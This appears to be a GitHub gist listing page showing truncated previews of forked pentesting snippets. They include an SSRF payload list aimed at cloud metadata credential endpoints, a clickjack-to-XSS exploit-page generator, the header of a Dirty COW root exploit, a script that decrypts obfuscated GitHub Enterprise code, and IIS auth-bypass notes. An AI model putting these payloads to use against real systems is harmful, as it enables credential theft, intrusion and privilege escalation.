Skip to content

Instantly share code, notes, and snippets.

View flying0er's full-sized avatar

令狐冲 flying0er

17 followers · 56 following
View GitHub Profile
@flying0er
flying0er / reddit.sh
Created April 30, 2018 01:51 — forked from EdOverflow/reddit.sh
Use reddit.com for recon purposes.
#!/bin/bash
# Variables
BOLD='\033[1m'
END='\033[0m'
# Queries
site_results=$(curl -Ls "https://www.reddit.com/search?q=site%3A$1" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" | tidy -q 2> /dev/null | grep "search-link")
url_results=$(curl -Ls "https://www.reddit.com/search?q=url%3A$1" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" | tidy -q 2> /dev/null | grep "search-link")
self_results=$(curl -Ls "https://www.reddit.com/search?q=selftext%3A$1" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" | grep "search-title")
@flying0er
flying0er / cloud_metadata.txt
Created April 26, 2018 08:47 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@flying0er
flying0er / benchmark-commands.txt
Created March 26, 2018 07:09 — forked from jkreps/benchmark-commands.txt
Kafka Benchmark Commands
Producer
Setup
bin/kafka-topics.sh --zookeeper esv4-hcl197.grid.linkedin.com:2181 --create --topic test-rep-one --partitions 6 --replication-factor 1
bin/kafka-topics.sh --zookeeper esv4-hcl197.grid.linkedin.com:2181 --create --topic test --partitions 6 --replication-factor 3
Single thread, no replication
bin/kafka-run-class.sh org.apache.kafka.clients.tools.ProducerPerformance test7 50000000 100 -1 acks=1 bootstrap.servers=esv4-hcl198.grid.linkedin.com:9092 buffer.memory=67108864 batch.size=8196
@flying0er
flying0er / cxp.py
Created November 22, 2017 14:02 — forked from vishwaraj101/cxp.py
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
@flying0er
flying0er / bounties.csv
Created November 17, 2017 02:45 — forked from nuthanmunaiah/bounties.csv
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00 https://hackerone.com/reports/18851
CVE-2015-3842 Android 2,000.00 https://code.google.com/p/android/issues/detail?id=177610
CVE-2015-3847 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=179147
CVE-2015-3860 Android 500.00 https://code.google.com/p/android/issues/detail?id=178139
CVE-2015-3862 Android 333.00 https://code.google.com/p/android/issues/detail?id=181895
CVE-2015-3865 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=182294
CVE-2015-3867 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182838
CVE-2015-3868 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182146
CVE-2015-3869 Android 3,000.00 https://code.google.com/p/android/issues/detail?id=182053
@flying0er
flying0er / ruby_revealer.sh
Created November 17, 2017 02:44 — forked from geoff-nixon/ruby_revealer.sh
#!/usr/bin/sudo sh
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as its not intended to discourage *me* from doing this!
@flying0er
flying0er / 短文件名漏洞
Created November 7, 2017 05:29 — forked from wh1t3p1g/短文件名漏洞
iis 短文件名猜解
apache+windows长文件名可用 前6个字符+"~1".ext 访问或者下载文件
iis 需要认证的目录 认证绕过
http://www.freebuf.com/articles/4908.html
Windows 支持的长文件名最多为 255 个字符。Windows 还以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows 的程序访问这些文件。
Windows 按以下方式从长文件名生成短文件名:
@flying0er
flying0er / ipless-scan.py
Created November 2, 2017 06:15 — forked from DiabloHorn/ipless-scan.py
Perform a port scan without having an IP configured on your network interface
#!/usr/bin/env python
# DiabloHorn - https://diablohorn.com
# scan target IP from an interface with no IP configured
# POC - scapy
# pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
# sendp(pkt,iface='eth0')
import sys
from scapy.all import *
@flying0er
flying0er / c0w.c
Created July 21, 2017 03:13 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@flying0er
flying0er / intercept-https-with-python-mitmproxy.md
Created August 17, 2016 06:25 — forked from dannvix/intercept-https-with-python-mitmproxy.md
Intercept and manipulate HTTPs traffic with Python and mitmproxy

Intercepts HTTPs Traffic with Python & mitmproxy

Warning

This Gist is created in 2014, and it's highliy outdated now, according to one of mitmproxy's manjor contributor (check his comment below). Thanks for letting us know, @mhils!

Introduction

Modern applications usually make use of back-end API servers to provide their services. With a non-transparent HTTPs proxy, which intercepts the communication between clients and servers (aka the man-in-the-middle scheme), you can easily manipulate both API requests and responses.